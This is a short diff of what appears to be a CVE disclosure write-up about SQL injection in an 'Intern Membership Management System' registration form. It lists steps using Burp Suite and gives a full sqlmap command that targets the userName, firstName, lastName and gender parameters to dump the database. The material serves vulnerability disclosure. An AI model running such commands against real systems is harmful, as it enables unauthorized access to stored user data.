h4md153v63n/CVEs/Intern_Membership_Management_System/Intern_Membership_Management_System-SQL-Injection.md

 + Fill the form and click 'Register' button.
 + Intercept the request via Burp Suite and send to Repeater.
 + Copy and paste the request to a "r.txt" file.
 + Use sqlmap to exploit.
-In sqlmap, use 'userName','firstName', 'lastName', '' and 'gender' parameters to dump the database.
+In sqlmap, use 'userName', 'firstName', 'lastName', and 'gender' parameters to dump the database.
 + `python sqlmap.py -r r.txt -p userName --risk 3 --level 5 --dbms mysql --proxy="http://127.0.0.1:8080" --batch --current-db`
 ```
 [23:08:01] [INFO] parsing HTTP request from 'r.txt'